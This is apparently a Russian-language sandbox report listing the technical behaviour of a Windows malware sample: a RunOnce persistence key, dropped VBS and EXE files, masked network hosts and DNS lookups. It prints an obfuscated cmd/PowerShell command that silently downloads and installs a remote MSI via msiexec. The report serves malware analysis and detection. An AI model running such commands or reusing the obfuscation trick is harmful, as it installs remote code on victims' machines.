Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'Startup key' = '%TEMP%\subfolder1\filename1.vbs'
- '<SYSTEM32>\cmd.exe' /c powershelL m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://aq#.to/12.msi
- msi8d34.tmp
- %TEMP%\subfolder1\filename1.exe
- %TEMP%\subfolder1\filename1.vbs
- 'aq#.to':80
- 'aq#.news':443
- 'r3.#.lencr.org':80
- 'Ch####rymalem.com':2020
- 'aq#.news':443
- 'Ch####rymalem.com':2020
- DNS ASK aq#.to
- DNS ASK aq#.news
- DNS ASK r3.#.lencr.org
- DNS ASK Ch####rymalem.com
- '%WINDIR%\installer\msi8d34.tmp'
- '<SYSTEM32>\cmd.exe' /c powershelL m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://aq#.to/12.msi' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msiexec.exe /q /i http://aq#.to/12.msi
- '<SYSTEM32>\msiexec.exe' /q /i http://aq#.to/12.msi